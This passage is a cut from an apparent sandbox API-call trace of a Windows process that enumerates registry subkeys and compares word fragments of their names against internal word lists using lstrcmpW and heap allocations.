hKey=0x260, dwIndex=0x14, lpName=0x19fd50, cchName=0x104 | out: lpName="DeviceGuard") returned 0x0 [0117.560] lstrlenW (lpString="DeviceGuard") returned 11 [0117.560] RtlAllocateHeap (HeapHandle=0x820000, Flags=0x0, Size=0x1a) returned 0x82c350 [0117.561] lstrcmpW (lpString1="backup", lpString2="device") returned -1 [0117.561] lstrcmpW (lpString1="locker", lpString2="device") returned 1 [0117.561] lstrcmpW (lpString1="device", lpString2="device") returned 0 [0117.561] HeapFree (in: hHeap=0x820000, dwFlags=0x0, lpMem=0x82c350 | out: hHeap=0x820000) returned 1 [0117.561] RtlAllocateHeap (HeapHandle=0x820000, Flags=0x0, Size=0x18) returned 0x82b7c8 [0117.561] lstrcmpW (lpString1="class", lpString2="guard") returned -1 [0117.561] lstrcmpW (lpString1="index", lpString2="guard") returned 1 [0117.561] lstrcmpW (lpString1="crash", lpString2="guard") returned -1 [0117.561] RegEnumKeyW (in: hKey=0x260, dwIndex=0x15, lpName=0x19fd50, cchName=0x104 | out: lpName="DeviceMigration") returned 0x0 [0117.561] lstrlenW (lpString="DeviceMigration") returned 15 [0117.561] RtlAllocateHeap (HeapHandle=0x820000, Flags=0x0, Size=0x1a) returned 0x82c260 [0117.561] lstrcmpW (lpString1="backup", lpString2="device") returned -1 [0117.561] lstrcmpW (lpString1="locker", lpString2="device") returned 1 [0117.561] lstrcmpW (lpString1="device", lpString2="device") returned 0 [0117.561] HeapFree (in: hHeap=0x820000, dwFlags=0x0, lpMem=0x82c260 | out: hHeap=0x820000) returned 1 [0117.561] RtlAllocateHeap (HeapHandle=0x820000, Flags=0x0, Size=0x20) returned 0x82c2d8 [0117.561] lstrcmpW (lpString1="readiness", lpString2="migration") returned 1 [0117.561] lstrcmpW (lpString1="container", lpString2="migration") returned -1 [0117.561] RegEnumKeyW (in: hKey=0x260, dwIndex=0x16, lpName=0x19fd50, cchName=0x104 | out: lpName="DeviceOverrides") returned 0x0 [0117.561] lstrlenW (lpString="DeviceOverrides") returned 15 [0117.561] RtlAllocateHeap (HeapHandle=0x820000, Flags=0x0, Size=0x1a) returned 0x82c288 [0117.561] lstrcmpW (lpString1="backup", lpString2="device") returned -1 [0117.562] lstrcmpW (lpString1="locker", lpString2="device") returned 1 [0117.562] lstrcmpW (lpString1="device", lpString2="device") returned 0 [0117.562] HeapFree (in: hHeap=0x820000, dwFlags=0x0, lpMem=0x82c288 | out: hHeap=0x820000) returned 1 [0117.562] RtlAllocateHeap (HeapHandle=0x820000, Flags=0x0, Size=0x20) returned 0x82c350 [0117.562] lstrcmpW (lpString1="readiness", lpString2="overrides") returned 1 [0117.562] lstrcmpW (lpString1="container", lpString2="overrides") returned -1 [0117.562] lstrcmpW (lpString1="migration", lpString2="overrides") returned -1 [0117.562] RegEnumKeyW (in: hKey=0x260, dwIndex=0x17, lpName=0x19fd50, cchName=0x104 | out: lpName="DevQuery") returned 0x0 [0117.562] lstrlenW (lpString="DevQuery") returned 8 [0117.562] RtlAllocateHeap (HeapHandle=0x820000, Flags=0x0, Size=0x14) returned 0x82b468 [0117.562] lstrcmpW (lpString1="app", lpString2="dev") returned -1 [0117.562] lstrcmpW (lpString1="bit", lpString2="dev") returned -1 [0117.562] lstrcmpW (lpString1="cmf", lpString2="dev") returned -1 [0117.562] lstrcmpW (lpString1="com", lpString2="dev") returned -1 [0117.562] RtlAllocateHeap (HeapHandle=0x820000, Flags=0x0, Size=0x18) returned 0x82b4a8 [0117.562] lstrcmpW (lpString1="class", lpString2="query") returned -1 [0117.562] lstrcmpW (lpString1="index", lpString2="query") returned -1 [0117.562] lstrcmpW (lpString1="crash", lpString2="query") returned -1 [0117.562] lstrcmpW (lpString1="guard", lpString2="query") returned -1 [0117.562] RegEnumKeyW (in: hKey=0x260, dwIndex=0x18, lpName=0x19fd50, cchName=0x104 | out: lpName="Diagnostics") returned 0x0 [0117.562] lstrlenW (lpString="Diagnostics") returned 11 [0117.562] RtlAllocateHeap (HeapHandle=0x820000, Flags=0x0, Size=0x24) returned 0x838ad0 [0117.563] RegEnumKeyW (in: hKey=0x260, dwIndex=0x19, lpName=0x19fd50, cchName=0x104 | out: lpName="DmaSecurity") returned 0x0 [0117.563] lstrlenW (lpString="DmaSecurity") returned 11 [0117.563] RtlAllocateHeap (HeapHandle=0x820000, Flags=0x0, Size=0x14) returned 0x82b508 [0117.563] lstrcmpW (lpString1="app", lpString2="dma") returned -1 [0117.563] lstrcmpW (lpString1="bit", lpString2="dma") returned -1 [0117.563] lstrcmpW (lpString1="cmf", lpString2="dma") returned -1 [0117.563] lstrcmpW (lpString1="com", lpString2="dma") returned -1 [0117.563] lstrcmpW (lpString1="dev", lpString2="dma") returned -1 [0117.563] RtlAllocateHeap (HeapHandle=0x820000, Flags=0x0, Size=0x1e) returned 0x82c468 [0117.563] lstrcmpW (lpString1="arbiters", lpString2="security") returned -1 [0117.563] lstrcmpW (lpString1="settings", lpString2="security") returned 1 [0117.563] lstrcmpW (lpString1="computer", lpString2="security") returned -1 [0117.563] lstrcmpW (lpString1="property", lpString2="security") returned -1 [0117.563] RegEnumKeyW (in: hKey=0x260, dwIndex=0x1a, lpName=0x19fd50, cchName=0x104 | out: lpName="EarlyLaunch") returned 0x0 [0117.563] lstrlenW (lpString="EarlyLaunch") returned 11 [0117.563] RtlAllocateHeap (HeapHandle=0x820000, Flags=0x0, Size=0x18) returned 0x82b4e8 [0117.563] lstrcmpW (lpString1="class", lpString2="early") returned -1 [0117.563] lstrcmpW (lpString1="index", lpString2="early") returned 1 [0117.563] lstrcmpW (lpString1="crash", lpString2="early") returned -1 [0117.563] lstrcmpW (lpString1="guard", lpString2="early") returned 1 [0117.564] lstrcmpW (lpString1="query", lpString2="early") returned 1 [0117.564] RtlAllocateHeap (HeapHandle=0x820000, Flags=0x0, Size=0x1a) returned 0x82c260 [0117.564] lstrcmpW (lpString1="backup", lpString2="launch") returned -1 [0117.564] lstrcmpW (lpString1="locker", lpString2="launch") returned 1 [0117.564] lstrcmpW (lpString1="device", lpString2="launch") returned -1 [0117.564] lstrcmpW (lpString1="common", lpString2="launch") returned -1 [0117.564] lstrcmpW (lpString1="update", lpString2="launch") returned 1 [0117.564] lstrcmpW (lpString1="events", lpString2="launch") returned -1 [0117.564] RegEnumKeyW (in: hKey=0x260, dwIndex=0x1b, lpName=0x19fd50, cchName=0x104 | out: lpName="EAS") returned 0x0 [0117.564] lstrlenW (lpString="EAS") returned 3 [0117.564] RtlAllocateHeap (HeapHandle=0x820000, Flags=0x0, Size=0x14) returned 0x82b588 [0117.564] lstrcmpW (lpString1="app", lpString2="eas") returned -1 [0117.564] lstrcmpW (lpString1="bit", lpString2="eas") returned -1 [0117.564] lstrcmpW (lpString1="cmf", lpString2="eas") returned -1 [0117.564] lstrcmpW (lpString1="com", lpString2="eas") returned -1 [0117.564] lstrcmpW (lpString1="dev", lpString2="eas") returned -1 [0117.564] lstrcmpW (lpString1="dma", lpString2="eas") returned -1 [0117.564] RegEnumKeyW (in: hKey=0x260, dwIndex=0x1c, lpName=0x19fd50, cchName=0x104 | out: lpName="Els") returned 0x0 [0117.564] lstrlenW (lpString="Els") returned 3 [0117.564] RtlAllocateHeap (HeapHandle=0x820000, Flags=0x0, Size=0x14) returned 0x82b5c8 [0117.564] lstrcmpW (lpString1="app", lpString2="els") returned -1 [0117.564] lstrcmpW (lpString1="bit", lpString2="els") returned -1 [0117.564] lstrcmpW (lpString1="cmf", lpString2="els") returned -1 [0117.565] lstrcmpW (lpString1="com", lpString2="els") returned -1 [0117.565] lstrcmpW (lpString1="dev", lpString2="els") returned -1 [0117.565] lstrcmpW (lpString1="dma", lpString2="els") returned -1 [0117.565] lstrcmpW (lpString1="eas", lpString2="els") returned -1 [0117.565] RegEnumKeyW (in: hKey=0x260, dwIndex=0x1d, lpName=0x19fd50, cchName=0x104 | out: lpName="Errata") returned 0x0 [0117.565] lstrlenW (lpString="Errata") returned 6 [0117.565] RtlAllocateHeap (HeapHandle=0x820000, Flags=0x0, Size=0x1a) returned 0x82c288 [0117.565] lstrcmpW (lpString1="backup", lpString2="errata") returned -1 [0117.565] lstrcmpW (lpString1="locker", lpString2="errata") returned 1 [0117.565] lstrcmpW (lpString1="device", lpString2="errata") returned -1 [0117.565] lstrcmpW (lpString1="common", lpString2="errata") returned -1 [0117.565] lstrcmpW (lpString1="update", lpString2="errata") returned 1 [0117.565] lstrcmpW (lpString1="events", lpString2="errata") returned 1 [0117.565] lstrcmpW (lpString1="launch", lpString2="errata") returned 1 [0117.565] RegEnumKeyW (in: hKey=0x260, dwIndex=0x1e, lpName=0x19fd50, cchName=0x104 | out: lpName="FileSystem") returned 0x0 [0117.565] lstrlenW (lpString="FileSystem") returned 10 [0117.565] RtlAllocateHeap (HeapHandle=0x820000, Flags=0x0, Size=0x16) returned 0x82b5e8 [0117.565] lstrcmpW (lpString1="acpi", lpString2="file") returned -1 [0117.565] lstrcmpW (lpString1="name", lpString2="file") returned 1 [0117.565] lstrcmpW (lpString1="glob", lpString2="file") returned 1 [0117.565] lstrcmpW (lpString1="user", lpString2="file") returned 1 [0117.565] RtlAllocateHeap (HeapHandle=0x820000, Flags=0x0, Size=0x1a) returned 0x82c3c8 [0117.565] lstrcmpW (lpString1="backup", lpString2="system") returned -1 [0117.565] lstrcmpW (lpString1="locker", lpString2="system") returned -1 [0117.566] lstrcmpW (lpString1="device", lpString2="system") returned -1 [0117.566] lstrcmpW (lpString1="common", lpString2="system") returned -1 [0117.566] lstrcmpW (lpString1="update", lpString2="system") returned 1 [0117.566] lstrcmpW (lpString1="events", lpString2="system") returned -1 [0117.566] lstrcmpW (lpString1="launch", lpString2="system") returned -1 [0117.566] lstrcmpW (lpString1="errata", lpString2="system") returned -1 [0117.566] RegEnumKeyW (in: hKey=0x260, dwIndex=0x1f, lpName=0x19fd50, cchName=0x104 | out: lpName="FileSystemUtilities") returned 0x0 [0117.566] lstrlenW (lpString="FileSystemUtilities") returned 19 [0117.566] RtlAllocateHeap (HeapHandle=0x820000, Flags=0x0, Size=0x16) returned 0x8486c8 [0117.566] lstrcmpW (lpString1="acpi", lpString2="file") returned -1 [0117.566] lstrcmpW (lpString1="name", lpString2="file") returned 1 [0117.566] lstrcmpW (lpString1="glob", lpString2="file") returned 1 [0117.566] lstrcmpW (lpString1="user", lpString2="file") returned 1 [0117.566] lstrcmpW (lpString1="file", lpString2="file") returned 0 [0117.566] HeapFree (in: hHeap=0x820000, dwFlags=0x0, lpMem=0x8486c8 | out: hHeap=0x820000) returned 1 [0117.566] RtlAllocateHeap (HeapHandle=0x820000, Flags=0x0, Size=0x1a) returned 0x82c238 [0117.566] lstrcmpW (lpString1="backup", lpString2="system") returned -1 [0117.566] lstrcmpW (lpString1="locker", lpString2="system") returned -1 [0117.566] lstrcmpW (lpString1="device", lpString2="system") returned -1 [0117.567] lstrcmpW (lpString1="common", lpString2="system") returned -1 [0117.567] lstrcmpW (lpString1="update", lpString2="system") returned 1 [0117.567] lstrcmpW (lpString1="events", lpString2="system") returned -1 [0117.567] lstrcmpW (lpString1="launch", lpString2="system") returned -1 [0117.567] lstrcmpW (lpString1="errata", lpString2="system") returned -1 [0117.567] lstrcmpW (lpString1="system", lpString2="system") returned 0 [0117.567] HeapFree (in: hHeap=0x820000, dwFlags=0x0, lpMem=0x82c238 | out: hHeap=0x820000) returned 1 [0117.567] RtlAllocateHeap (HeapHandle=0x820000, Flags=0x0, Size=0x20) returned 0x82c1e8 [0117.567] lstrcmpW (lpString1="readiness", lpString2="utilities") returned -1 [0117.567] lstrcmpW (lpString1="container", lpString2="utilities") returned -1 [0117.567] lstrcmpW (lpString1="migration", lpString2="utilities") returned -1 [0117.567] lstrcmpW (lpString1="overrides", lpString2="utilities") returned -1 [0117.567] RegEnumKeyW (in: hKey=0x260, dwIndex=0x20, lpName=0x19fd50, cchName=0x104 | out: lpName="GraphicsDrivers") returned 0x0 [0117.567] lstrlenW (lpString="GraphicsDrivers") returned 15 [0117.567] RtlAllocateHeap (HeapHandle=0x820000, Flags=0x0, Size=0x1e) returned 0x82c378 [0117.567] lstrcmpW (lpString1="arbiters", lpString2="graphics") returned -1 [0117.567] lstrcmpW (lpString1="settings", lpString2="graphics") returned 1 [0117.567] lstrcmpW (lpString1="computer", lpString2="graphics") returned -1 [0117.567] lstrcmpW (lpString1="property", lpString2="graphics") returned 1 [0117.567] lstrcmpW (lpString1="security", lpString2="graphics") returned 1 [0117.567] RtlAllocateHeap (HeapHandle=0x820000, Flags=0x0, Size=0x1c) returned 0x82c328 [0117.568] lstrcmpW (lpString1="restore", lpString2="drivers") returned 1 [0117.568] lstrcmpW (lpString1="arbiter", lpString2="drivers") returned -1 [0117.568] lstrcmpW (lpString1="content", lpString2="drivers") returned -1 [0117.568] lstrcmpW (lpString1="control", lpString2="drivers") returned -1 [0117.568] lstrcmpW (lpString1="classes", lpString2="drivers") returned -1 [0117.568] RegEnumKeyW (in: hKey=0x260, dwIndex=0x21, lpName=0x19fd50, cchName=0x104 | out: lpName="GroupOrderList") returned 0x0 [0117.568] lstrlenW (lpString="GroupOrderList") returned 14 [0117.568] RtlAllocateHeap (HeapHandle=0x820000, Flags=0x0, Size=0x18) returned 0x848908 [0117.568] lstrcmpW (lpString1="class", lpString2="group") returned -1 [0117.568] lstrcmpW (lpString1="index", lpString2="group") returned 1 [0117.568] lstrcmpW (lpString1="crash", lpString2="group") returned -1 [0117.568] lstrcmpW (lpString1="guard", lpString2="group") returned 1 [0117.568] lstrcmpW (lpString1="query", lpString2="group") returned 1 [0117.568] lstrcmpW (lpString1="early", lpString2="group") returned -1 [0117.568] RtlAllocateHeap (HeapHandle=0x820000, Flags=0x0, Size=0x18) returned 0x848728 [0117.568] lstrcmpW (lpString1="class", lpString2="order") returned -1 [0117.568] lstrcmpW (lpString1="index", lpString2="order") returned -1 [0117.568] lstrcmpW (lpString1="crash", lpString2="order") returned -1 [0117.568] lstrcmpW (lpString1="guard", lpString2="order") returned -1 [0117.568] lstrcmpW (lpString1="query", lpString2="order") returned 1 [0117.568] lstrcmpW (lpString1="early", lpString2="order") returned -1 [0117.568] lstrcmpW (lpString1="group", lpString2="order") returned -1 [0117.568] RtlAllocateHeap (HeapHandle=0x820000, Flags=0x0, Size=0x16) returned 0x848808 [0117.569] lstrcmpW (lpString1="acpi", lpString2="list") returned -1 [0117.569] lstrcmpW (lpString1="name", lpString2="list") returned 1 [0117.569] lstrcmpW (lpString1="glob", lpString2="list") returned -1 [0117.569] lstrcmpW (lpString1="user", lpString2="list") returned 1 [0117.569] lstrcmpW (lpString1="file", lpString2="list") returned -1 [0117.569] RegEnumKeyW (in: hKey=0x260, dwIndex=0x22, lpName=0x19fd50, cchName=0x104 | out: lpName="HAL") returned 0x0 [0117.569] lstrlenW (lpString="HAL") returned 3 [0117.569] RtlAllocateHeap (HeapHandle=0x820000, Flags=0x0, Size=0x14) returned 0x848828 [0117.569] lstrcmpW (lpString1="app", lpString2="hal") returned -1 [0117.569] lstrcmpW (lpString1="bit", lpString2="hal") returned -1 [0117.569] lstrcmpW (lpString1="cmf", lpString2="hal") returned -1 [0117.569] lstrcmpW (lpString1="com", lpString2="hal") returned -1 [0117.569] lstrcmpW (lpString1="dev", lpString2="hal") returned -1 [0117.569] lstrcmpW (lpString1="dma", lpString2="hal") returned -1 [0117.569] lstrcmpW (lpString1="eas", lpString2="hal") returned -1 [0117.569] lstrcmpW (lpString1="els", lpString2="hal") returned -1 [0117.569] RegEnumKeyW (in: hKey=0x260, dwIndex=0x23, lpName=0x19fd50, cchName=0x104 | out: lpName="IDConfigDB") returned 0x0 [0117.569] lstrlenW (lpString="IDConfigDB") returned 10 [0117.569] RtlAllocateHeap (HeapHandle=0x820000, Flags=0x0, Size=0x1e) returned 0x82c238 [0117.569] lstrcmpW (lpString1="arbiters", lpString2="idconfig") returned -1 [0117.569] lstrcmpW (lpString1="settings", lpString2="idconfig") returned 1 [0117.569] lstrcmpW (lpString1="computer", lpString2="idconfig") returned -1 [0117.569] lstrcmpW (lpString1="property", lpString2="idconfig") returned 1 [0117.569] lstrcmpW (lpString1="security", lpString2="idconfig") returned 1 [0117.570] lstrcmpW (lpString1="graphics", lpString2="idconfig") returned -1 [0117.570] RtlAllocateHeap (HeapHandle=0x820000, Flags=0x0, Size=0x12) returned 0x8488a8 [0117.570] lstrcmpW (lpString1="id", lpString2="db") returned 1 [0117.570] lstrcmpW (lpString1="ci", lpString2="db") returned -1 [0117.570] lstrcmpW (lpString1="co", lpString2="db") returned -1 [0117.570] RegEnumKeyW (in: hKey=0x260, dwIndex=0x24, lpName=0x19fd50, cchName=0x104 | out: lpName="InitialMachineConfig") returned 0x0 [0117.570] lstrlenW (lpString="InitialMachineConfig") returned 20 [0117.570] RtlAllocateHeap (HeapHandle=0x820000, Flags=0x0, Size=0x1c) returned 0x849100 [0117.571] lstrcmpW (lpString1="restore", lpString2="initial") returned 1 [0117.571] lstrcmpW (lpString1="arbiter", lpString2="initial") returned -1 [0117.571] lstrcmpW (lpString1="content", lpString2="initial") returned -1 [0117.571] lstrcmpW (lpString1="control", lpString2="initial") returned -1 [0117.571] lstrcmpW (lpString1="classes", lpString2="initial") returned -1 [0117.571] lstrcmpW (lpString1="drivers", lpString2="initial") returned -1 [0117.571] RtlAllocateHeap (HeapHandle=0x820000, Flags=0x0, Size=0x1c) returned 0x849330 [0117.571] lstrcmpW (lpString1="restore", lpString2="machine") returned 1 [0117.571] lstrcmpW (lpString1="arbiter", lpString2="machine") returned -1 [0117.571] lstrcmpW (lpString1="content", lpString2="machine") returned -1 [0117.571] lstrcmpW (lpString1="control", lpString2="machine") returned -1 [0117.571] lstrcmpW (lpString1="classes", lpString2="machine") returned -1 [0117.571] lstrcmpW (lpString1="drivers", lpString2="machine") returned -1 [0117.571] lstrcmpW (lpString1="initial", lpString2="machine") returned -1 [0117.571] RtlAllocateHeap (HeapHandle=0x820000, Flags=0x0, Size=0x1a) returned 0x848f20 [0117.571] lstrcmpW (lpString1="backup", lpString2="config") returned -1 [0117.571] lstrcmpW (lpString1="locker", lpString2="config") returned 1 [0117.571] lstrcmpW (lpString1="device", lpString2="config") returned 1 [0117.571] lstrcmpW (lpString1="common", lpString2="config") returned -1 [0117.571] lstrcmpW (lpString1="update", lpString2="config") returned 1 [0117.571] lstrcmpW (lpString1="events", lpString2="config") returned 1 [0117.571] lstrcmpW (lpString1="launch", lpString2="config") returned 1 [0117.571] lstrcmpW (lpString1="errata", lpString2="config") returned 1 [0117.571] lstrcmpW (lpString1="system", lpString2="config") returned 1 [0117.572] RegEnumKeyW (in: hKey=0x260, dwIndex=0x25, lpName=0x19fd50, cchName=0x104 | out: lpName="IPMI") returned 0x0 [0117.572] lstrlenW (lpString="IPMI") returned 4 [0117.572] RtlAllocateHeap (HeapHandle=0x820000, Flags=0x0, Size=0x16) returned 0x848848 [0117.572] lstrcmpW (lpString1="acpi", lpString2="ipmi") returned -1 [0117.572] lstrcmpW (lpString1="name", lpString2="ipmi") returned 1 [0117.572] lstrcmpW (lpString1="glob", lpString2="ipmi") returned -1 [0117.572] lstrcmpW (lpString1="user", lpString2="ipmi") returned 1 [0117.572] lstrcmpW (lpString1="file", lpString2="ipmi") returned -1 [0117.572] lstrcmpW (lpString1="list", lpString2="ipmi") returned 1 [0117.572] RegEnumKeyW (in: hKey=0x260, dwIndex=0x26, lpName=0x19fd50, cchName=0x104 | out: lpName="Keyboard Layout") returned 0x0 [0117.572] lstrlenW (lpString="Keyboard Layout") returned 15 [0117.572] RtlAllocateHeap (HeapHandle=0x820000, Flags=0x0, Size=0x1e) returned 0x849240 [0117.572] lstrcmpW (lpString1="arbiters", lpString2="keyboard") returned -1 [0117.572] lstrcmpW (lpString1="settings", lpString2="keyboard") returned 1 [0117.572] lstrcmpW (lpString1="computer", lpString2="keyboard") returned -1 [0117.572] lstrcmpW (lpString1="property", lpString2="keyboard") returned 1 [0117.572] lstrcmpW (lpString1="security", lpString2="keyboard") returned 1 [0117.572] lstrcmpW (lpString1="graphics", lpString2="keyboard") returned -1 [0117.572] lstrcmpW (lpString1="idconfig", lpString2="keyboard") returned -1 [0117.572] RtlAllocateHeap (HeapHandle=0x820000, Flags=0x0, Size=0x1a) returned 0x849268 [0117.572] lstrcmpW (lpString1="backup", lpString2="layout") returned -1 [0117.573] lstrcmpW (lpString1="locker", lpString2="layout") returned 1 [0117.573] lstrcmpW (lpString1="device", lpString2="layout") returned -1 [0117.573] lstrcmpW (lpString1="common", lpString2="layout") returned -1 [0117.573] lstrcmpW (lpString1="update", lpString2="layout") returned 1 [0117.573] lstrcmpW (lpString1="events", lpString2="layout") returned -1 [0117.573] lstrcmpW (lpString1="launch", lpString2="layout") returned -1 [0117.573] lstrcmpW (lpString1="errata", lpString2="layout") returned -1 [0117.573] lstrcmpW (lpString1="system", lpString2="layout") returned 1 [0117.573] lstrcmpW (lpString1="config", lpString2="layout") returned -1 [0117.573] RegEnumKeyW (in: hKey=0x260, dwIndex=0x27, lpName=0x19fd50, cchName=0x104 | out: lpName="Keyboard Layouts") returned 0x0 [0117.573] lstrlenW (lpString="Keyboard Layouts") returned 16 [0117.573] RtlAllocateHeap (HeapHandle=0x820000, Flags=0x0, Size=0x1e) returned 0x848ed0 [0117.573] lstrcmpW (lpString1="arbiters", lpString2="keyboard") returned -1 [0117.573] HeapFree (in: hHeap=0x820000, dwFlags=0x0, lpMem=0x848ed0 | out: hHeap=0x820000) returned 1 [0117.573] RtlAllocateHeap (HeapHandle=0x820000, Flags=0x0, Size=0x1c) returned 0x849308 [0117.574] RegEnumKeyW (in: hKey=0x260, dwIndex=0x28, lpName=0x19fd50, cchName=0x104 | out: lpName="Lsa") returned 0x0 [0117.574] lstrlenW (lpString="Lsa") returned 3 [0117.574] RtlAllocateHeap (HeapHandle=0x820000, Flags=0x0, Size=0x14) returned 0x848a88 [0117.574] RegEnumKeyW (in: hKey=0x260, dwIndex=0x29, lpName=0x19fd50, cchName=0x104 | out: lpName="LsaExtensionConfig") returned 0x0 [0117.574] lstrlenW (lpString="LsaExtensionConfig") returned 18 [0117.574] RtlAllocateHeap (HeapHandle=0x820000, Flags=0x0, Size=0x14) returned 0x848708 [0117.574] HeapFree (in: hHeap=0x820000, dwFlags=0x0, lpMem=0x848708 | out: hHeap=0x820000) returned 1 [0117.574] RtlAllocateHeap (HeapHandle=0x820000, Flags=0x0, Size=0x20) returned 0x8491c8 [0117.574] RtlAllocateHeap (HeapHandle=0x820000, Flags=0x0, Size=0x1a) returned 0x849060 [0117.574] HeapFree (in: hHeap=0x820000, dwFlags=0x0, lpMem=0x849060 | out: hHeap=0x820000) returned 1 [0117.574] RegEnumKeyW (in: hKey=0x260, dwIndex=0x2a, lpName=0x19fd50, cchName=0x104 | out: lpName="LsaInformation") returned 0x0 [0117.574] lstrlenW (lpString="LsaInformation") returned 14 [0117.574] RtlAllocateHeap (HeapHandle=0x820000, Flags=0x0, Size=0x14) returned 0x8489e8 [0117.574] HeapFree (in: hHeap=0x820000, dwFlags=0x0, lpMem=0x8489e8 | out: hHeap=0x820000) returned 1 [0117.574] RtlAllocateHeap (HeapHandle=0x820000, Flags=0x0, Size=0x24) returned 0x838d70 [0117.574] RegEnumKeyW (in: hKey=0x260, dwIndex=0x2b, lpName=0x19fd50, cchName=0x104 | out: lpName="ManufacturingMode") returned 0x0 [0117.575] lstrlenW (lpString="ManufacturingMode") returned 17 [0117.575] RtlAllocateHeap (HeapHandle=0x820000, Flags=0x0, Size=0x28) returned 0x838da0 [0117.575] RtlAllocateHeap (HeapHandle=0x820000, Flags=0x0, Size=0x16) returned 0x848928 [0117.575] RegEnumKeyW (in: hKey=0x260, dwIndex=0x2c, lpName=0x19fd50, cchName=0x104 | out: lpName="MediaCategories") returned 0x0 [0117.575] lstrlenW (lpString="MediaCategories") returned 15 [0117.575] RtlAllocateHeap (HeapHandle=0x820000, Flags=0x0, Size=0x18) returned 0x848988 [0117.575] RtlAllocateHeap (HeapHandle=0x820000, Flags=0x0, Size=0x22) returned 0x838dd0 [0117.575] RegEnumKeyW (in: hKey=0x260, dwIndex=0x2d, lpName=0x19fd50, cchName=0x104 | out: lpName="MediaInterfaces") returned 0x0 [0117.575] lstrlenW (lpString="MediaInterfaces") returned 15 [0117.575] RtlAllocateHeap (HeapHandle=0x820000, Flags=0x0, Size=0x18) returned 0x848748 [0117.575] HeapFree (in: hHeap=0x820000, dwFlags=0x0, lpMem=0x848748 | out: hHeap=0x820000) returned 1 [0117.575] RtlAllocateHeap (HeapHandle=0x820000, Flags=0x0, Size=0x22) returned 0x838e00 [0117.575] RegEnumKeyW (in: hKey=0x260, dwIndex=0x2e, lpName=0x19fd50, cchName=0x104 | out: lpName="MediaProperties") returned 0x0 [0117.575] lstrlenW (lpString="MediaProperties") returned 15 [0117.575] RtlAllocateHeap (HeapHandle=0x820000, Flags=0x0, Size=0x18) returned 0x8488c8 [0117.576] HeapFree (in: hHeap=0x820000, dwFlags=0x0, lpMem=0x8488c8 | out: hHeap=0x820000) returned 1 [0117.576] RtlAllocateHeap (HeapHandle=0x820000, Flags=0x0, Size=0x22) returned 0x838e30 [0117.576] RegEnumKeyW (in: hKey=0x260, dwIndex=0x2f, lpName=0x19fd50, cchName=0x104 | out: lpName="MSDTC") returned 0x0 [0117.576] lstrlenW (lpString="MSDTC") returned 5 [0117.576] RtlAllocateHeap (HeapHandle=0x820000, Flags=0x0, Size=0x18) returned 0x8487e8 [0117.576] RegEnumKeyW (in: hKey=0x260, dwIndex=0x30, lpName=0x19fd50, cchName=0x104 | out: lpName="MUI") returned 0x0 [0117.576] lstrlenW (lpString="MUI") returned 3 [0117.576] RtlAllocateHeap (HeapHandle=0x820000, Flags=0x0, Size=0x14) returned 0x848a08 [0117.576] RegEnumKeyW (in: hKey=0x260, dwIndex=0x31, lpName=0x19fd50, cchName=0x104 | out: lpName="NetDiagFx") returned 0x0 [0117.576] lstrlenW (lpString="NetDiagFx") returned 9 [0117.576] RtlAllocateHeap (HeapHandle=0x820000, Flags=0x0, Size=0x14) returned 0x848868 [0117.576] RtlAllocateHeap (HeapHandle=0x820000, Flags=0x0, Size=0x16) returned 0x848948 [0117.576] RtlAllocateHeap (HeapHandle=0x820000, Flags=0x0, Size=0x12) returned 0x848888 [0117.576] RegEnumKeyW (in: hKey=0x260, dwIndex=0x32, lpName=0x19fd50, cchName=0x104 | out: lpName="NetDrivers") returned 0x0 [0117.576] lstrlenW (lpString="NetDrivers") returned 10 [0117.576] RtlAllocateHeap (HeapHandle=0x820000, Flags=0x0, Size=0x14) returned 0x848968 [0117.577] HeapFree (in: hHeap=0x820000, dwFlags=0x0, lpMem=0x848968 | out: hHeap=0x820000) returned 1 [0117.577] RtlAllocateHeap (HeapHandle=0x820000, Flags=0x0, Size=0x1c) returned 0x848ed0 [0117.577] HeapFree (in: hHeap=0x820000, dwFlags=0x0, lpMem=0x848ed0 | out: hHeap=0x820000) returned 1 [0117.577] RegEnumKeyW (in: hKey=0x260, dwIndex=0x33, lpName=0x19fd50, cchName=0x104 | out: lpName="NetProvision") returned 0x0 [0117.577] lstrlenW (lpString="NetProvision") returned 12 [0117.577] RtlAllocateHeap (HeapHandle=0x820000, Flags=0x0, Size=0x14) returned 0x848968 [0117.577] HeapFree (in: hHeap=0x820000, dwFlags=0x0, lpMem=0x848968 | out: hHeap=0x820000) returned 1 [0117.577] RtlAllocateHeap (HeapHandle=0x820000, Flags=0x0, Size=0x20) returned 0x849358 [0117.577] RegEnumKeyW (in: hKey=0x260, dwIndex=0x34, lpName=0x19fd50, cchName=0x104 | out: lpName="NetTrace") returned 0x0 [0117.577] lstrlenW (lpString="NetTrace") returned 8 [0117.577] RtlAllocateHeap (HeapHandle=0x820000, Flags=0x0, Size=0x14) returned 0x848968 [0117.577] HeapFree (in: hHeap=0x820000, dwFlags=0x0, lpMem=0x848968 | out: hHeap=0x820000) returned 1 [0117.577] RtlAllocateHeap (HeapHandle=0x820000, Flags=0x0, Size=0x18) returned 0x848a28 [0117.577] RegEnumKeyW (in: hKey=0x260, dwIndex=0x35, lpName=0x19fd50, cchName=0x104 | out: lpName="Network") returned 0x0 [0117.577] lstrlenW (lpString="Network") returned 7 [0117.577] RtlAllocateHeap (HeapHandle=0x820000, Flags=0x0, Size=0x1c) returned 0x848f70 [0117.578] RegEnumKeyW (in: hKey=0x260, dwIndex=0x36, lpName=0x19fd50, cchName=0x104 | out: lpName="NetworkProvider") returned 0x0 [0117.578] lstrlenW (lpString="NetworkProvider") returned 15 [0117.578] RtlAllocateHeap (HeapHandle=0x820000, Flags=0x0, Size=0x1c) returned 0x849150 [0117.578] HeapFree (in: hHeap=0x820000, dwFlags=0x0, lpMem=0x849150 | out: hHeap=0x820000) returned 1 [0117.578] RtlAllocateHeap (HeapHandle=0x820000, Flags=0x0, Size=0x1e) returned 0x849380 [0117.578] RegEnumKeyW (in: hKey=0x260, dwIndex=0x37, lpName=0x19fd50, cchName=0x104 | out: lpName="NetworkSetup2") returned 0x0 [0117.578] lstrlenW (lpString="NetworkSetup2") returned 13 [0117.578] RtlAllocateHeap (HeapHandle=0x820000, Flags=0x0, Size=0x1c) returned 0x8493a8 [0117.578] HeapFree (in: hHeap=0x820000, dwFlags=0x0, lpMem=0x8493a8 | out: hHeap=0x820000) returned 1 [0117.578] RtlAllocateHeap (HeapHandle=0x820000, Flags=0x0, Size=0x1a) returned 0x8490d8 [0117.578] RegEnumKeyW (in: hKey=0x260, dwIndex=0x38, lpName=0x19fd50, cchName=0x104 | out: lpName="NetworkUxManager") returned 0x0 [0117.578] lstrlenW (lpString="NetworkUxManager") returned 16 [0117.578] RtlAllocateHeap 